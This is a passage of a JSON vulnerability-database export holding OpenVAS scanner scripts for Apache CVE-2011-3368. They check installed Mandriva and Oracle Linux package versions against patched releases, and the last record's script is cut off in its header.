rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:55:21", "description": "Check for the Version of apache", "cvss3": {}, "published": "2011-10-10T00:00:00", "type": "openvas", "title": "Mandriva Update for apache MDVSA-2011:144 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831460", "href": "http://plugins.openvas.org/nasl.php?oid=831460", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2011:144 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered and corrected in apache:\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\n interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern\n matches for configuration of a reverse proxy, which allows remote\n attackers to send requests to intranet servers via a malformed URI\n containing an initial \\@ (at sign) character (CVE-2011-3368).\n \n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\n \n The updated packages have been patched to correct this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"apache on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-10/msg00017.php\");\n script_id(831460);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-10 16:05:48 +0200 (Mon, 10 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"MDVSA\", value: \"2011:144\");\n script_cve_id(\"CVE-2011-3368\");\n script_name(\"Mandriva Update for apache MDVSA-2011:144 (apache)\");\n\n script_summary(\"Check for the Version of apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:36:35", "description": "Oracle Linux Local Security Checks ELSA-2011-1392", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2011-1392", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122067", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1392.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122067\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:12:31 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1392\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1392 - httpd security and bug fix update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1392\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1392.html\");\n script_cve_id(\"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.0.2.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-02T21:13:39", "description": "Apache HTTP Server is prone to an information disclosure\nvulnerability.\n\nAn attacker can exploit this vulnerability to gain access to sensitive\ninformation.", "cvss3": {}, "published": "2011-10-11T00:00:00", "type": "openvas", "title": "Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3368"], "modified": "2017-02-25T00:00:00", "id": "OPENVAS:103293", "href": "http://plugins.openvas.org/nasl.php?oid=103293", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_49957.nasl 5424 2017-02-25 16:52:36Z teissa $\n#\n# Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Apache HTTP Server is prone to an information disclosure\nvulnerability.\n\nAn attacker can exploit this vulnerability to gain access to sensitive\ninformation.\";\n\ntag_solution = \"The vendor released an update. Please see the references for details.\";\n\nif (description)\n{\n script_id(103293);\n script_tag(name:\"creation_date\", value:\"2011-10-11 17:46:33 +0200 (Tue, 11 Oct 2011)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_bugtraq_id(49957,50802);\n script_cve_id(\"CVE-2011-3368\",\"CVE-2011-4317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version (\"$Revision: 5424 $\");\n\n script_name(\"Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/49957\");\n script_xref(name : \"URL\" , value : \"http://httpd.apache.org/\");\n script_xref(name : \"URL\" , value : \"http://seclists.org/fulldisclosure/2011/Oct/232\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web Servers\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n 